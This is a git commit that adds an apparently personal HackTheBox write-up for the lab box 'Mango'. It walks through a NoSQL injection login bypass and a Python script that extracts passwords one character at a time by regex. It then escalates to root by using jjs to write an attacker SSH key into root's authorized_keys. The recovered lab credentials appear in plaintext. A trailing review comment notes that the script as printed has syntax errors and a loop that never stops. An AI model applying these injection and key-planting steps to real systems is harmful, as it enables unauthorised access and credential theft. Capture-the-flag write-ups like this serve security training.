add hacking blogposts as they are

oxeo0 2025-05-07 01:02:00 +02:00
parent fa65088be1
commit 325b9c3814
1904 changed files with 91353 additions and 0 deletions

Medium/50.md Normal file (481 lines)

@ -0,0 +1,481 @@
# Mango Writeup
![](img/50.png)
## Introduction :
Mango is a Medium linux box released back in October 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ nmap -sCV -p22,80,443 10.10.10.162
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-22 09:05 CEST
Nmap scan report for 10.10.10.162
Host is up (0.46s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.36 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 with the domain name **staging-order.mango.htb** so let's investigate it after we add it to our hosts file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.162 staging-order.mango.htb mango.htb' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 mango.htb ; ping -c1 staging-order.mango.htb
PING staging-order.mango.htb (10.10.10.162) 56(84) bytes of data.
64 bytes from staging-order.mango.htb (10.10.10.162): icmp_seq=1 ttl=63 time=466 ms
--- staging-order.mango.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 466.188/466.188/466.188/0.000 ms
PING staging-order.mango.htb (10.10.10.162) 56(84) bytes of data.
64 bytes from staging-order.mango.htb (10.10.10.162): icmp_seq=1 ttl=63 time=461 ms
--- staging-order.mango.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 460.854/460.854/460.854/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
Now mango.htb gives us a 403 forbidden error message:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ curl mango.htb
403 Forbidden
# Forbidden
You don't have permission to access this resource.
* * *
Apache/2.4.29 (Ubuntu) Server at mango.htb Port 80
However the **staging-order** subdomain has something else for us:
![](prg/50_001.png)
Now we intercept the POST login request with burpsuite, and send it to the repeater:
![](prg/50_002.png)
Now once we send the request, we see that it just puts us back at the login page with nothing interesting to debug the logins themselves.
![](prg/50_003.png)
So instead we're going to use ffuf to find webpages:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -fc 403 -u http://staging-order.mango.htb**/FUZZ**
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://staging-order.mango.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
# [Status: 200, Size: 4022, Words: 447, Lines: 210]
# [Status: 200, Size: 4022, Words: 447, Lines: 210]
[...]
**vendor [Status: 301, Size: 335, Words: 20, Lines: 10]**
[WARN] Caught keyboard interrupt (Ctrl-C)
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 50 -fc 403 -u http://staging-order.mango.htb**/vendor/FUZZ**
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://staging-order.mango.htb/vendor/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
**composer [Status: 301, Size: 344, Words: 20, Lines: 10]**
[WARN] Caught keyboard interrupt (Ctrl-C)
Here we found the **/vendor/composer/** directory, [composer](https://en.wikipedia.org/wiki/Composer_\(software\)) is a PHP dependency manager that provides a standard format for managing dependencies of PHP software and required libraries. Composer usually contains a file called **installed.json** so we browse to see if it's there:
![](prg/50_004.png)
And since we have been able to verify that the box has a [mongodb NoSQL](https://www.mongodb.com/nosql-explained) backend we can now assume that we need to perform a [NoSQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
![](prg/50_005.png)
So here we have a few potential NoSQL injections to try out, but the one we need here is the **[$ne]** (not equal) authentication bypass exploit:
![](prg/50_006.png)
We attempt the not equal ([$ne]) authentication bypass and succeed to login as the admin user, however we don't get anything interesting after logging in:
![](prg/50_007.png)
so instead when we take another look at the payloadallthethings nosql cheatsheet, we see that it is possible to extract informations from the database via regex:
![](prg/50_008.png)
So we make the following python script to automate this information disclosure:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ cat injection.py
import requests
def inject(data):
r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False)
if r.status_code != 200:
return True
secret = ""
payload= ""
while True:
data = { "username[$regex]":"^" + payload + "$", "password[$ne]":"admin", "login":"login" }
if inject(data):
break
for i in range(32,126):
if chr(i) in ['.','?','*','^']:
payload = secret + "\\" + chr(i)
else:
payload = secret +chr(i)
print("\r" + payload, flush=False, end='')
data = { **"username":"admin", "password[$regex]":"^" + payload** , "login":"login" }
if inject(data):
print("\r" + payload, flush=True, end='' )
secret= secret + chr(i)
break
print()
We're going to try to get the admin password:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ python3 injection.py
t++9++K++c++S++3++>!++0++B#++2$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
And as you can see it matches the **$** as being the end of the line, however the + symbol is a bad character so we need to filter it:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ vim injection.py
[...]
if chr(i) in ['.','?','*','^','+']:
[...]
:wq
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ python3 injection.py
t9KcS3>!0B#2$$$$$$$$
Now that we have the admin credentials **admin:t9KcS3>!0B#2** , now let's get the mango user's password:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ vim injection.py
[...]
for i in range(32,127):
if chr(i) in ['.','?','*','^', '+', '|']:
[...]
data = { **"username":"mango", "password[$regex]":"^" + payload** , "login":"login" }
[...]
:wq
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ python3 injection.py
h3mXK8RhU~f{]f5H$$$$$$$$$$$$$$$$$
So now we have mango's credentials: **mango:h3mXK8RhU~f{]f5H**
So let's login via SSH:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 22 09:45:28 UTC 2021
System load: 0.0 Processes: 102
Usage of /: 25.8% of 19.56GB Users logged in: 0
Memory usage: 15% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ id
uid=1000(mango) gid=1000(mango) groups=1000(mango)
We are now logged in as the user mango, but we also have other credentials for the admin user, so let's try them:
mango@mango:~$ su - admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ bash
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
admin@mango:/home/admin$ ls
user.txt
admin@mango:/home/admin$ cat user.txt
0aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get to the admin user on the box and print the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc on this box we're going to use linpeas.sh to enumerate it:
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ cp /home/nothing/HTB/Traverxec/linpeas.sh .
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
admin@mango:/home/admin$ wget http://10.10.14.11:9090/linpeas.sh -O /tmp/peas.sh
--2021-06-22 09:49:08-- http://10.10.14.11:9090/linpeas.sh
Connecting to 10.10.14.11:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /tmp/peas.sh
/tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K 175KB/s in 1.9s
2021-06-22 09:49:11 (175 KB/s) - /tmp/peas.sh saved [341863/341863]
admin@mango:/home/admin$ chmod +x /tmp/peas.sh
admin@mango:/home/admin$ /tmp/peas.sh
` ![](prg/50_009.png)
Let it run and then scrolling through the output we stumble upon **/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs**
![](prg/50_010.png)
For that we can take a look at [gtfobins:](https://gtfobins.github.io/gtfobins/jjs/#file-write)
![](prg/50_011.png)
So here we have our template exploit bashscript:
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs
we're going to modify it to place a public ssh key into /root/.ssh/authorized_keys
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere");
fw.close();' | jjs
download the exploit onto the box:
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ cat exploit.sh
#!/bin/bash
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere");
fw.close();' | jjs
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
admin@mango:/home/admin$ wget http://10.10.14.11:9090/exploit.sh -O /tmp/exploit.sh
--2021-06-22 09:59:06-- http://10.10.14.11:9090/exploit.sh
Connecting to 10.10.14.11:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [text/x-sh]
Saving to: /tmp/exploit.sh
/tmp/exploit.sh 100%[===========================================================================================================================================>] 250 --.-KB/s in 0s
2021-06-22 09:59:07 (22.7 MB/s) - /tmp/exploit.sh saved [250/250]
admin@mango:/home/admin$ chmod +x /tmp/exploit.sh
admin@mango:/home/admin$ /tmp/exploit.sh
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var FileWriter = Java.type("java.io.FileWriter");
jjs> var fw=new FileWriter("/root/.ssh/authorized_keys");
jjs> fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere");
jjs> fw.close();
jjs> admin@mango:/home/admin$
now login as root:
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ ssh root@10.10.10.162 -i ~/.ssh/mainpc
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 22 09:59:46 UTC 2021
System load: 0.0 Processes: 112
Usage of /: 26.0% of 19.56GB Users logged in: 1
Memory usage: 10% IP address for ens33: 10.10.10.162
Swap usage: 5%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# cat /root/root.txt
70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/50_graph.png)
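Review bot: the `injection.py` listing under `cat injection.py` will not run as committed, and its loop never terminates on its own. The markdown bold markers leaked into the source (`data = { **"username":"admin", "password[$regex]":"^" + payload** , "login":"login" }` is a Python syntax error, and the same line appears again in the later `vim` excerpt), and the stop check at the top of the `while` (`"username[$regex]":"^" + payload + "$"` together with `"password[$ne]":"admin"`) asks whether a user whose name equals the recovered string exists, not whether the password is complete, so it never fires; because `$` is not in the escape list, `^t9KcS3>!0B#2$` keeps matching and the script appends `$` until Ctrl-C, which is what the `$$$$$$$$` tails in the output are. Suggest stripping the `**`, escaping `$` along with `+` and `|` and the other regex metacharacters in the first listing rather than patching them in one at a time, and breaking out of the `while` when the inner `for` finds no matching character. `range(32,126)` also excludes `~` (126); the later edit to `range(32,127)` fixes that for the mango password, but the first listing keeps the off-by-one. Minor: the image line after `/tmp/peas.sh` carries a stray leading backtick, and the hosts-file step says nmap found `staging-order.mango.htb` on port 80 when the name came from the TLS certificate on 443.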